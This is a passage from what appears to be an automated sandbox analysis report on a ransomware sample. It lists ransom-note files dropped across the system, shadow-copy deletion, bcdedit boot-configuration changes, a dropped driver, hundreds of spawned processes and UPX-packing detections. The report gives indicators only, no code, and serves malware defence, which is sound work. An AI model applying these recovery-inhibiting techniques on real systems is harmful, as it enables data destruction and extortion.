Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Searches\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Microsoft Help\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Pictures\Sample Pictures\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\OfflineCache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1444 bcdedit.exe 968 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS jigPt9cX64.exe -
Executes dropped EXE 359 IoCs
pid Process 1780 NWQdhQ0m.exe 472 jigPt9cX.exe 1388 jigPt9cX64.exe 864 jigPt9cX.exe 336 jigPt9cX.exe 1260 jigPt9cX.exe 1872 jigPt9cX.exe 1020 jigPt9cX.exe 1828 jigPt9cX.exe 1428 jigPt9cX.exe 1144 jigPt9cX.exe 320 jigPt9cX.exe 564 jigPt9cX.exe 240 jigPt9cX.exe 1572 jigPt9cX.exe 1000 jigPt9cX.exe 320 jigPt9cX.exe 1152 jigPt9cX.exe 800 jigPt9cX.exe 1912 jigPt9cX.exe 1536 jigPt9cX.exe 1848 jigPt9cX.exe 320 jigPt9cX.exe 1908 jigPt9cX.exe 1316 jigPt9cX.exe 992 jigPt9cX.exe 336 jigPt9cX.exe 880 jigPt9cX.exe 1476 jigPt9cX.exe 1756 jigPt9cX.exe 1028 jigPt9cX.exe 800 jigPt9cX.exe 1224 jigPt9cX.exe 1284 jigPt9cX.exe 560 jigPt9cX.exe 1868 jigPt9cX.exe 1864 jigPt9cX.exe 816 jigPt9cX.exe 560 jigPt9cX.exe 228 jigPt9cX.exe 832 jigPt9cX.exe 1568 jigPt9cX.exe 1800 jigPt9cX.exe 396 jigPt9cX.exe 236 jigPt9cX.exe 780 jigPt9cX.exe 1876 jigPt9cX.exe 800 jigPt9cX.exe 1824 jigPt9cX.exe 1920 jigPt9cX.exe 1908 jigPt9cX.exe 1988 jigPt9cX.exe 1496 jigPt9cX.exe 744 jigPt9cX.exe 1144 jigPt9cX.exe 1836 jigPt9cX.exe 1800 jigPt9cX.exe 1908 jigPt9cX.exe 1868 jigPt9cX.exe 1260 jigPt9cX.exe 1444 jigPt9cX.exe 1916 jigPt9cX.exe 940 jigPt9cX.exe 1476 jigPt9cX.exe 1852 jigPt9cX.exe 1780 jigPt9cX.exe 960 jigPt9cX.exe 1992 jigPt9cX.exe 816 jigPt9cX.exe 556 jigPt9cX.exe 880 jigPt9cX.exe 1480 jigPt9cX.exe 204 jigPt9cX.exe 1876 jigPt9cX.exe 1568 jigPt9cX.exe 1264 jigPt9cX.exe 1424 jigPt9cX.exe 1908 jigPt9cX.exe 560 jigPt9cX.exe 1228 jigPt9cX.exe 1912 jigPt9cX.exe 904 jigPt9cX.exe 204 jigPt9cX.exe 1836 jigPt9cX.exe 1476 jigPt9cX.exe 1876 jigPt9cX.exe 968 jigPt9cX.exe 1000 jigPt9cX.exe 1908 jigPt9cX.exe 1704 jigPt9cX.exe 880 jigPt9cX.exe 1480 jigPt9cX.exe 1928 jigPt9cX.exe 816 jigPt9cX.exe 972 jigPt9cX.exe 1820 jigPt9cX.exe 744 jigPt9cX.exe 1624 jigPt9cX.exe 560 jigPt9cX.exe 1756 jigPt9cX.exe 208 jigPt9cX.exe 1704 jigPt9cX.exe 1780 jigPt9cX.exe 432 jigPt9cX.exe 1224 jigPt9cX.exe 1836 jigPt9cX.exe 1316 jigPt9cX.exe 1380 jigPt9cX.exe 676 jigPt9cX.exe 1624 jigPt9cX.exe 1572 jigPt9cX.exe 1864 jigPt9cX.exe 1568 jigPt9cX.exe 1260 jigPt9cX.exe 1824 jigPt9cX.exe 1072 jigPt9cX.exe 304 jigPt9cX.exe 1836 jigPt9cX.exe 1812 jigPt9cX.exe 972 jigPt9cX.exe 816 jigPt9cX.exe 800 jigPt9cX.exe 1696 jigPt9cX.exe 1852 jigPt9cX.exe 1676 jigPt9cX.exe 1256 jigPt9cX.exe 1264 jigPt9cX.exe 1696 jigPt9cX.exe 1572 jigPt9cX.exe 1920 jigPt9cX.exe 204 jigPt9cX.exe 952 jigPt9cX.exe 1480 jigPt9cX.exe 744 jigPt9cX.exe 1916 jigPt9cX.exe 1912 jigPt9cX.exe 572 jigPt9cX.exe 1824 jigPt9cX.exe 1476 jigPt9cX.exe 216 jigPt9cX.exe 880 jigPt9cX.exe 1380 jigPt9cX.exe 1264 jigPt9cX.exe 828 jigPt9cX.exe 1572 jigPt9cX.exe 956 jigPt9cX.exe 1256 jigPt9cX.exe 1908 jigPt9cX.exe 1152 jigPt9cX.exe 800 jigPt9cX.exe 216 jigPt9cX.exe 1260 jigPt9cX.exe 572 jigPt9cX.exe 816 jigPt9cX.exe 556 jigPt9cX.exe 960 jigPt9cX.exe 824 jigPt9cX.exe 1780 jigPt9cX.exe 1476 jigPt9cX.exe 1572 jigPt9cX.exe 1284 jigPt9cX.exe 896 jigPt9cX.exe 1692 jigPt9cX.exe 1876 jigPt9cX.exe 1988 jigPt9cX.exe 744 jigPt9cX.exe 1928 jigPt9cX.exe 1444 jigPt9cX.exe 956 jigPt9cX.exe 1316 jigPt9cX.exe 304 jigPt9cX.exe 1920 jigPt9cX.exe 1072 jigPt9cX.exe 1912 jigPt9cX.exe 1536 jigPt9cX.exe 1876 jigPt9cX.exe 1256 jigPt9cX.exe 592 jigPt9cX.exe 1380 jigPt9cX.exe 1696 jigPt9cX.exe 880 jigPt9cX.exe 816 jigPt9cX.exe 1624 jigPt9cX.exe 960 jigPt9cX.exe 1820 jigPt9cX.exe 780 jigPt9cX.exe 1824 jigPt9cX.exe 940 jigPt9cX.exe 1812 jigPt9cX.exe 204 jigPt9cX.exe 1152 jigPt9cX.exe 952 jigPt9cX.exe 1228 jigPt9cX.exe 1424 jigPt9cX.exe 572 jigPt9cX.exe 1476 jigPt9cX.exe 880 jigPt9cX.exe 968 jigPt9cX.exe 1284 jigPt9cX.exe 1992 jigPt9cX.exe 1820 jigPt9cX.exe 1260 jigPt9cX.exe 556 jigPt9cX.exe 1908 jigPt9cX.exe 828 jigPt9cX.exe 1028 jigPt9cX.exe 1752 jigPt9cX.exe 1536 jigPt9cX.exe 1572 jigPt9cX.exe 1144 jigPt9cX.exe 1864 jigPt9cX.exe 1380 jigPt9cX.exe 1692 jigPt9cX.exe 1496 jigPt9cX.exe 1084 jigPt9cX.exe 940 jigPt9cX.exe 1568 jigPt9cX.exe 744 jigPt9cX.exe 1444 jigPt9cX.exe 1824 jigPt9cX.exe 828 jigPt9cX.exe 960 jigPt9cX.exe 1752 jigPt9cX.exe 1928 jigPt9cX.exe 1496 jigPt9cX.exe 1000 jigPt9cX.exe 992 jigPt9cX.exe 1992 jigPt9cX.exe 556 jigPt9cX.exe 1988 jigPt9cX.exe 1256 jigPt9cX.exe 1624 jigPt9cX.exe 1264 jigPt9cX.exe 396 jigPt9cX.exe 1572 jigPt9cX.exe 1912 jigPt9cX.exe 904 jigPt9cX.exe 828 jigPt9cX.exe 940 jigPt9cX.exe 1380 jigPt9cX.exe 1496 jigPt9cX.exe 1696 jigPt9cX.exe 1568 jigPt9cX.exe 1756 jigPt9cX.exe 896 jigPt9cX.exe 1692 jigPt9cX.exe 1596 jigPt9cX.exe 952 jigPt9cX.exe 320 jigPt9cX.exe 1224 jigPt9cX.exe 1380 jigPt9cX.exe 1284 jigPt9cX.exe 1796 jigPt9cX.exe 1812 jigPt9cX.exe 1756 jigPt9cX.exe 1144 jigPt9cX.exe 1692 jigPt9cX.exe 1824 jigPt9cX.exe 216 jigPt9cX.exe 556 jigPt9cX.exe 1224 jigPt9cX.exe 968 jigPt9cX.exe 1836 jigPt9cX.exe 1000 jigPt9cX.exe 396 jigPt9cX.exe 940 jigPt9cX.exe 1228 jigPt9cX.exe 1796 jigPt9cX.exe 972 jigPt9cX.exe 1696 jigPt9cX.exe 824 jigPt9cX.exe 1256 jigPt9cX.exe 204 jigPt9cX.exe 1692 jigPt9cX.exe 1284 jigPt9cX.exe 896 jigPt9cX.exe 1224 jigPt9cX.exe 1572 jigPt9cX.exe 1028 jigPt9cX.exe 780 jigPt9cX.exe 396 jigPt9cX.exe 1756 jigPt9cX.exe 1228 jigPt9cX.exe 960 jigPt9cX.exe 972 jigPt9cX.exe 1992 jigPt9cX.exe 1916 jigPt9cX.exe 304 jigPt9cX.exe 1876 jigPt9cX.exe 1752 jigPt9cX.exe 1144 jigPt9cX.exe 1800 jigPt9cX.exe 208 jigPt9cX.exe 1912 jigPt9cX.exe 1028 jigPt9cX.exe 1796 jigPt9cX.exe 1988 jigPt9cX.exe 216 jigPt9cX.exe 1820 jigPt9cX.exe 1000 jigPt9cX.exe 396 jigPt9cX.exe 1424 jigPt9cX.exe 1228 jigPt9cX.exe 1928 jigPt9cX.exe 1780 jigPt9cX.exe 1152 jigPt9cX.exe 340 jigPt9cX.exe 572 jigPt9cX.exe 560 jigPt9cX.exe 1824 jigPt9cX.exe 1256 jigPt9cX.exe 1068 jigPt9cX.exe 1260 jigPt9cX.exe 1992 jigPt9cX.exe 744 jigPt9cX.exe 1028 jigPt9cX.exe 1256 jigPt9cX.exe 1916 jigPt9cX.exe 1260 jigPt9cX.exe 560 jigPt9cX.exe 1316 jigPt9cX.exe 1824 jigPt9cX.exe 1224 jigPt9cX.exe 1068 jigPt9cX.exe 824 jigPt9cX.exe 1852 jigPt9cX.exe 1316 jigPt9cX.exe 1284 jigPt9cX.exe 1572 jigPt9cX.exe 1424 jigPt9cX.exe 1260 jigPt9cX.exe 1852 jigPt9cX.exe 896 jigPt9cX.exe 1380 jigPt9cX.exe 1780 jigPt9cX.exe 1856 jigPt9cX.exe 1516 jigPt9cX.exe 560 jigPt9cX.exe 1228 jigPt9cX.exe 1636 jigPt9cX.exe 1224 jigPt9cX.exe 828 jigPt9cX.exe 952 jigPt9cX.exe 1928 jigPt9cX.exe 744 jigPt9cX.exe 1380 jigPt9cX.exe 1256 jigPt9cX.exe 1856 jigPt9cX.exe 1412 jigPt9cX.exe 560 jigPt9cX.exe 780 jigPt9cX.exe 1028 jigPt9cX.exe 1824 jigPt9cX.exe 828 jigPt9cX.exe 1696 jigPt9cX.exe 1144 jigPt9cX.exe 896 jigPt9cX.exe 788 jigPt9cX.exe 832 jigPt9cX.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\GrantFormat.tiff 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00030000000131d3-19.dat upx behavioral1/files/0x00030000000131d3-20.dat upx behavioral1/files/0x00030000000131d3-23.dat upx behavioral1/files/0x00030000000131d3-36.dat upx behavioral1/files/0x00030000000131d3-38.dat upx behavioral1/files/0x00030000000131d3-39.dat upx behavioral1/files/0x00030000000131d3-41.dat upx behavioral1/files/0x00030000000131d3-47.dat upx behavioral1/files/0x00030000000131d3-49.dat upx behavioral1/files/0x00030000000131d3-50.dat upx behavioral1/files/0x00030000000131d3-52.dat upx behavioral1/files/0x00030000000131d3-58.dat upx behavioral1/files/0x00030000000131d3-60.dat upx behavioral1/files/0x00030000000131d3-61.dat upx behavioral1/files/0x00030000000131d3-63.dat upx behavioral1/files/0x00030000000131d3-68.dat upx behavioral1/files/0x00030000000131d3-70.dat upx behavioral1/files/0x00030000000131d3-71.dat upx behavioral1/files/0x00030000000131d3-73.dat upx behavioral1/files/0x00030000000131d3-78.dat upx behavioral1/files/0x00030000000131d3-80.dat upx behavioral1/files/0x00030000000131d3-81.dat upx behavioral1/files/0x00030000000131d3-83.dat upx behavioral1/files/0x00030000000131d3-88.dat upx behavioral1/files/0x00030000000131d3-90.dat upx behavioral1/files/0x00030000000131d3-91.dat upx behavioral1/files/0x00030000000131d3-93.dat upx behavioral1/files/0x00030000000131d3-98.dat upx behavioral1/files/0x00030000000131d3-100.dat upx behavioral1/files/0x00030000000131d3-101.dat upx behavioral1/files/0x00030000000131d3-103.dat upx behavioral1/files/0x00030000000131d3-108.dat upx behavioral1/files/0x00030000000131d3-110.dat upx behavioral1/files/0x00030000000131d3-111.dat upx behavioral1/files/0x00030000000131d3-113.dat upx behavioral1/files/0x00030000000131d3-118.dat upx behavioral1/files/0x00030000000131d3-120.dat upx behavioral1/files/0x00030000000131d3-121.dat upx behavioral1/files/0x00030000000131d3-123.dat upx behavioral1/files/0x00030000000131d3-128.dat upx behavioral1/files/0x00030000000131d3-130.dat upx behavioral1/files/0x00030000000131d3-131.dat upx behavioral1/files/0x00030000000131d3-133.dat upx behavioral1/files/0x00030000000131d3-138.dat upx behavioral1/files/0x00030000000131d3-140.dat upx behavioral1/files/0x00030000000131d3-141.dat upx behavioral1/files/0x00030000000131d3-143.dat upx behavioral1/files/0x00030000000131d3-148.dat upx behavioral1/files/0x00030000000131d3-150.dat upx behavioral1/files/0x00030000000131d3-151.dat upx behavioral1/files/0x00030000000131d3-153.dat upx behavioral1/files/0x00030000000131d3-158.dat upx behavioral1/files/0x00030000000131d3-160.dat upx behavioral1/files/0x00030000000131d3-161.dat upx behavioral1/files/0x00030000000131d3-163.dat upx behavioral1/files/0x00030000000131d3-168.dat upx behavioral1/files/0x00030000000131d3-170.dat upx behavioral1/files/0x00030000000131d3-171.dat upx behavioral1/files/0x00030000000131d3-173.dat upx behavioral1/files/0x00030000000131d3-178.dat upx behavioral1/files/0x00030000000131d3-180.dat upx behavioral1/files/0x00030000000131d3-181.dat upx behavioral1/files/0x00030000000131d3-183.dat upx behavioral1/files/0x00030000000131d3-188.dat upx behavioral1/files/0x00030000000131d3-190.dat upx behavioral1/files/0x00030000000131d3-191.dat upx behavioral1/files/0x00030000000131d3-193.dat upx behavioral1/files/0x00030000000131d3-198.dat upx behavioral1/files/0x00030000000131d3-200.dat upx behavioral1/files/0x00030000000131d3-201.dat upx behavioral1/files/0x00030000000131d3-203.dat upx behavioral1/files/0x00030000000131d3-208.dat upx behavioral1/files/0x00030000000131d3-210.dat upx behavioral1/files/0x00030000000131d3-211.dat upx behavioral1/files/0x00030000000131d3-213.dat upx behavioral1/files/0x00030000000131d3-219.dat upx behavioral1/files/0x00030000000131d3-221.dat upx behavioral1/files/0x00030000000131d3-222.dat upx behavioral1/files/0x00030000000131d3-224.dat upx behavioral1/files/0x00030000000131d3-229.dat upx behavioral1/files/0x00030000000131d3-231.dat upx behavioral1/files/0x00030000000131d3-232.dat upx behavioral1/files/0x00030000000131d3-234.dat upx behavioral1/files/0x00030000000131d3-239.dat upx behavioral1/files/0x00030000000131d3-241.dat upx behavioral1/files/0x00030000000131d3-242.dat upx behavioral1/files/0x00030000000131d3-244.dat upx behavioral1/files/0x00030000000131d3-249.dat upx behavioral1/files/0x00030000000131d3-251.dat upx behavioral1/files/0x00030000000131d3-252.dat upx behavioral1/files/0x00030000000131d3-254.dat upx behavioral1/files/0x00030000000131d3-259.dat upx behavioral1/files/0x00030000000131d3-261.dat upx behavioral1/files/0x00030000000131d3-262.dat upx behavioral1/files/0x00030000000131d3-264.dat upx behavioral1/files/0x00030000000131d3-269.dat upx behavioral1/files/0x00030000000131d3-271.dat upx behavioral1/files/0x00030000000131d3-272.dat upx behavioral1/files/0x00030000000131d3-274.dat upx behavioral1/files/0x00030000000131d3-279.dat upx behavioral1/files/0x00030000000131d3-281.dat upx behavioral1/files/0x00030000000131d3-282.dat upx behavioral1/files/0x00030000000131d3-284.dat upx behavioral1/files/0x00030000000131d3-290.dat upx behavioral1/files/0x00030000000131d3-292.dat upx behavioral1/files/0x00030000000131d3-293.dat upx behavioral1/files/0x00030000000131d3-295.dat upx behavioral1/files/0x00030000000131d3-300.dat upx behavioral1/files/0x00030000000131d3-302.dat upx behavioral1/files/0x00030000000131d3-304.dat upx behavioral1/files/0x00030000000131d3-306.dat upx behavioral1/files/0x00030000000131d3-312.dat upx behavioral1/files/0x00030000000131d3-314.dat upx behavioral1/files/0x00030000000131d3-315.dat upx behavioral1/files/0x00030000000131d3-317.dat upx behavioral1/files/0x00030000000131d3-322.dat upx behavioral1/files/0x00030000000131d3-324.dat upx behavioral1/files/0x00030000000131d3-325.dat upx behavioral1/files/0x00030000000131d3-327.dat upx behavioral1/files/0x00030000000131d3-332.dat upx behavioral1/files/0x00030000000131d3-334.dat upx behavioral1/files/0x00030000000131d3-335.dat upx behavioral1/files/0x00030000000131d3-337.dat upx behavioral1/files/0x00030000000131d3-342.dat upx behavioral1/files/0x00030000000131d3-344.dat upx behavioral1/files/0x00030000000131d3-345.dat upx behavioral1/files/0x00030000000131d3-347.dat upx behavioral1/files/0x00030000000131d3-352.dat upx behavioral1/files/0x00030000000131d3-354.dat upx behavioral1/files/0x00030000000131d3-355.dat upx behavioral1/files/0x00030000000131d3-357.dat upx behavioral1/files/0x00030000000131d3-362.dat upx behavioral1/files/0x00030000000131d3-364.dat upx behavioral1/files/0x00030000000131d3-365.dat upx behavioral1/files/0x00030000000131d3-367.dat upx behavioral1/files/0x00030000000131d3-372.dat upx behavioral1/files/0x00030000000131d3-374.dat upx behavioral1/files/0x00030000000131d3-377.dat upx behavioral1/files/0x00030000000131d3-375.dat upx behavioral1/files/0x00030000000131d3-382.dat upx behavioral1/files/0x00030000000131d3-384.dat upx behavioral1/files/0x00030000000131d3-385.dat upx behavioral1/files/0x00030000000131d3-387.dat upx behavioral1/files/0x00030000000131d3-392.dat upx behavioral1/files/0x00030000000131d3-394.dat upx behavioral1/files/0x00030000000131d3-395.dat upx behavioral1/files/0x00030000000131d3-397.dat upx behavioral1/files/0x00030000000131d3-402.dat upx behavioral1/files/0x00030000000131d3-404.dat upx behavioral1/files/0x00030000000131d3-405.dat upx behavioral1/files/0x00030000000131d3-407.dat upx behavioral1/files/0x00030000000131d3-412.dat upx behavioral1/files/0x00030000000131d3-414.dat upx behavioral1/files/0x00030000000131d3-415.dat upx behavioral1/files/0x00030000000131d3-417.dat upx behavioral1/files/0x00030000000131d3-422.dat upx behavioral1/files/0x00030000000131d3-424.dat upx behavioral1/files/0x00030000000131d3-425.dat upx behavioral1/files/0x00030000000131d3-427.dat upx behavioral1/files/0x00030000000131d3-432.dat upx behavioral1/files/0x00030000000131d3-434.dat upx behavioral1/files/0x00030000000131d3-435.dat upx behavioral1/files/0x00030000000131d3-437.dat upx behavioral1/files/0x00030000000131d3-442.dat upx behavioral1/files/0x00030000000131d3-444.dat upx behavioral1/files/0x00030000000131d3-445.dat upx behavioral1/files/0x00030000000131d3-447.dat upx behavioral1/files/0x00030000000131d3-452.dat upx behavioral1/files/0x00030000000131d3-454.dat upx behavioral1/files/0x00030000000131d3-455.dat upx behavioral1/files/0x00030000000131d3-457.dat upx behavioral1/files/0x00030000000131d3-462.dat upx behavioral1/files/0x00030000000131d3-464.dat upx behavioral1/files/0x00030000000131d3-465.dat upx behavioral1/files/0x00030000000131d3-467.dat upx behavioral1/files/0x00030000000131d3-472.dat upx behavioral1/files/0x00030000000131d3-474.dat upx behavioral1/files/0x00030000000131d3-475.dat upx behavioral1/files/0x00030000000131d3-477.dat upx behavioral1/files/0x00030000000131d3-482.dat upx behavioral1/files/0x00030000000131d3-484.dat upx behavioral1/files/0x00030000000131d3-485.dat upx behavioral1/files/0x00030000000131d3-487.dat upx behavioral1/files/0x00030000000131d3-492.dat upx behavioral1/files/0x00030000000131d3-494.dat upx behavioral1/files/0x00030000000131d3-495.dat upx behavioral1/files/0x00030000000131d3-497.dat upx behavioral1/files/0x00030000000131d3-502.dat upx behavioral1/files/0x00030000000131d3-504.dat upx behavioral1/files/0x00030000000131d3-505.dat upx behavioral1/files/0x00030000000131d3-507.dat upx behavioral1/files/0x00030000000131d3-512.dat upx behavioral1/files/0x00030000000131d3-514.dat upx behavioral1/files/0x00030000000131d3-515.dat upx behavioral1/files/0x00030000000131d3-517.dat upx behavioral1/files/0x00030000000131d3-522.dat upx behavioral1/files/0x00030000000131d3-524.dat upx behavioral1/files/0x00030000000131d3-525.dat upx behavioral1/files/0x00030000000131d3-527.dat upx behavioral1/files/0x00030000000131d3-532.dat upx behavioral1/files/0x00030000000131d3-534.dat upx behavioral1/files/0x00030000000131d3-535.dat upx behavioral1/files/0x00030000000131d3-537.dat upx behavioral1/files/0x00030000000131d3-542.dat upx behavioral1/files/0x00030000000131d3-544.dat upx behavioral1/files/0x00030000000131d3-545.dat upx behavioral1/files/0x00030000000131d3-547.dat upx behavioral1/files/0x00030000000131d3-552.dat upx behavioral1/files/0x00030000000131d3-554.dat upx behavioral1/files/0x00030000000131d3-555.dat upx behavioral1/files/0x00030000000131d3-557.dat upx behavioral1/files/0x00030000000131d3-562.dat upx behavioral1/files/0x00030000000131d3-564.dat upx behavioral1/files/0x00030000000131d3-565.dat upx behavioral1/files/0x00030000000131d3-567.dat upx behavioral1/files/0x00030000000131d3-572.dat upx behavioral1/files/0x00030000000131d3-574.dat upx behavioral1/files/0x00030000000131d3-575.dat upx behavioral1/files/0x00030000000131d3-577.dat upx behavioral1/files/0x00030000000131d3-582.dat upx behavioral1/files/0x00030000000131d3-584.dat upx behavioral1/files/0x00030000000131d3-585.dat upx behavioral1/files/0x00030000000131d3-587.dat upx behavioral1/files/0x00030000000131d3-592.dat upx behavioral1/files/0x00030000000131d3-594.dat upx behavioral1/files/0x00030000000131d3-595.dat upx behavioral1/files/0x00030000000131d3-597.dat upx behavioral1/files/0x00030000000131d3-602.dat upx behavioral1/files/0x00030000000131d3-604.dat upx behavioral1/files/0x00030000000131d3-605.dat upx behavioral1/files/0x00030000000131d3-607.dat upx behavioral1/files/0x00030000000131d3-612.dat upx behavioral1/files/0x00030000000131d3-614.dat upx behavioral1/files/0x00030000000131d3-615.dat upx behavioral1/files/0x00030000000131d3-617.dat upx behavioral1/files/0x00030000000131d3-622.dat upx behavioral1/files/0x00030000000131d3-624.dat upx behavioral1/files/0x00030000000131d3-625.dat upx behavioral1/files/0x00030000000131d3-627.dat upx behavioral1/files/0x00030000000131d3-632.dat upx behavioral1/files/0x00030000000131d3-634.dat upx behavioral1/files/0x00030000000131d3-635.dat upx behavioral1/files/0x00030000000131d3-637.dat upx behavioral1/files/0x00030000000131d3-642.dat upx behavioral1/files/0x00030000000131d3-644.dat upx behavioral1/files/0x00030000000131d3-645.dat upx behavioral1/files/0x00030000000131d3-647.dat upx behavioral1/files/0x00030000000131d3-652.dat upx behavioral1/files/0x00030000000131d3-654.dat upx behavioral1/files/0x00030000000131d3-655.dat upx behavioral1/files/0x00030000000131d3-657.dat upx behavioral1/files/0x00030000000131d3-662.dat upx behavioral1/files/0x00030000000131d3-664.dat upx behavioral1/files/0x00030000000131d3-665.dat upx behavioral1/files/0x00030000000131d3-667.dat upx behavioral1/files/0x00030000000131d3-672.dat upx behavioral1/files/0x00030000000131d3-674.dat upx behavioral1/files/0x00030000000131d3-675.dat upx behavioral1/files/0x00030000000131d3-677.dat upx behavioral1/files/0x00030000000131d3-682.dat upx behavioral1/files/0x00030000000131d3-684.dat upx behavioral1/files/0x00030000000131d3-685.dat upx behavioral1/files/0x00030000000131d3-687.dat upx behavioral1/files/0x00030000000131d3-692.dat upx behavioral1/files/0x00030000000131d3-694.dat upx behavioral1/files/0x00030000000131d3-695.dat upx behavioral1/files/0x00030000000131d3-697.dat upx behavioral1/files/0x00030000000131d3-702.dat upx behavioral1/files/0x00030000000131d3-704.dat upx behavioral1/files/0x00030000000131d3-705.dat upx behavioral1/files/0x00030000000131d3-707.dat upx behavioral1/files/0x00030000000131d3-712.dat upx behavioral1/files/0x00030000000131d3-714.dat upx behavioral1/files/0x00030000000131d3-715.dat upx behavioral1/files/0x00030000000131d3-717.dat upx behavioral1/files/0x00030000000131d3-722.dat upx behavioral1/files/0x00030000000131d3-724.dat upx behavioral1/files/0x00030000000131d3-725.dat upx behavioral1/files/0x00030000000131d3-727.dat upx behavioral1/files/0x00030000000131d3-732.dat upx behavioral1/files/0x00030000000131d3-734.dat upx behavioral1/files/0x00030000000131d3-735.dat upx behavioral1/files/0x00030000000131d3-737.dat upx behavioral1/files/0x00030000000131d3-742.dat upx behavioral1/files/0x00030000000131d3-744.dat upx behavioral1/files/0x00030000000131d3-745.dat upx behavioral1/files/0x00030000000131d3-747.dat upx behavioral1/files/0x00030000000131d3-752.dat upx behavioral1/files/0x00030000000131d3-754.dat upx behavioral1/files/0x00030000000131d3-755.dat upx behavioral1/files/0x00030000000131d3-757.dat upx behavioral1/files/0x00030000000131d3-762.dat upx behavioral1/files/0x00030000000131d3-764.dat upx behavioral1/files/0x00030000000131d3-765.dat upx behavioral1/files/0x00030000000131d3-767.dat upx behavioral1/files/0x00030000000131d3-772.dat upx behavioral1/files/0x00030000000131d3-774.dat upx behavioral1/files/0x00030000000131d3-775.dat upx behavioral1/files/0x00030000000131d3-777.dat upx behavioral1/files/0x00030000000131d3-782.dat upx behavioral1/files/0x00030000000131d3-784.dat upx behavioral1/files/0x00030000000131d3-785.dat upx behavioral1/files/0x00030000000131d3-787.dat upx behavioral1/files/0x00030000000131d3-792.dat upx behavioral1/files/0x00030000000131d3-794.dat upx behavioral1/files/0x00030000000131d3-795.dat upx behavioral1/files/0x00030000000131d3-797.dat upx behavioral1/files/0x00030000000131d3-802.dat upx behavioral1/files/0x00030000000131d3-804.dat upx behavioral1/files/0x00030000000131d3-805.dat upx behavioral1/files/0x00030000000131d3-807.dat upx behavioral1/files/0x00030000000131d3-812.dat upx behavioral1/files/0x00030000000131d3-814.dat upx behavioral1/files/0x00030000000131d3-815.dat upx behavioral1/files/0x00030000000131d3-817.dat upx behavioral1/files/0x00030000000131d3-822.dat upx behavioral1/files/0x00030000000131d3-824.dat upx behavioral1/files/0x00030000000131d3-825.dat upx behavioral1/files/0x00030000000131d3-827.dat upx behavioral1/files/0x00030000000131d3-832.dat upx behavioral1/files/0x00030000000131d3-834.dat upx behavioral1/files/0x00030000000131d3-835.dat upx behavioral1/files/0x00030000000131d3-837.dat upx behavioral1/files/0x00030000000131d3-842.dat upx behavioral1/files/0x00030000000131d3-844.dat upx behavioral1/files/0x00030000000131d3-845.dat upx behavioral1/files/0x00030000000131d3-847.dat upx behavioral1/files/0x00030000000131d3-852.dat upx behavioral1/files/0x00030000000131d3-854.dat upx behavioral1/files/0x00030000000131d3-855.dat upx behavioral1/files/0x00030000000131d3-857.dat upx behavioral1/files/0x00030000000131d3-862.dat upx behavioral1/files/0x00030000000131d3-864.dat upx behavioral1/files/0x00030000000131d3-865.dat upx behavioral1/files/0x00030000000131d3-867.dat upx behavioral1/files/0x00030000000131d3-872.dat upx behavioral1/files/0x00030000000131d3-874.dat upx behavioral1/files/0x00030000000131d3-875.dat upx behavioral1/files/0x00030000000131d3-877.dat upx behavioral1/files/0x00030000000131d3-882.dat upx behavioral1/files/0x00030000000131d3-884.dat upx behavioral1/files/0x00030000000131d3-885.dat upx behavioral1/files/0x00030000000131d3-887.dat upx behavioral1/files/0x00030000000131d3-892.dat upx behavioral1/files/0x00030000000131d3-894.dat upx behavioral1/files/0x00030000000131d3-895.dat upx behavioral1/files/0x00030000000131d3-897.dat upx behavioral1/files/0x00030000000131d3-902.dat upx behavioral1/files/0x00030000000131d3-904.dat upx behavioral1/files/0x00030000000131d3-905.dat upx behavioral1/files/0x00030000000131d3-907.dat upx behavioral1/files/0x00030000000131d3-912.dat upx behavioral1/files/0x00030000000131d3-914.dat upx behavioral1/files/0x00030000000131d3-915.dat upx behavioral1/files/0x00030000000131d3-917.dat upx behavioral1/files/0x00030000000131d3-922.dat upx behavioral1/files/0x00030000000131d3-924.dat upx behavioral1/files/0x00030000000131d3-925.dat upx behavioral1/files/0x00030000000131d3-927.dat upx behavioral1/files/0x00030000000131d3-932.dat upx behavioral1/files/0x00030000000131d3-934.dat upx behavioral1/files/0x00030000000131d3-935.dat upx behavioral1/files/0x00030000000131d3-937.dat upx behavioral1/files/0x00030000000131d3-942.dat upx behavioral1/files/0x00030000000131d3-944.dat upx behavioral1/files/0x00030000000131d3-945.dat upx behavioral1/files/0x00030000000131d3-947.dat upx 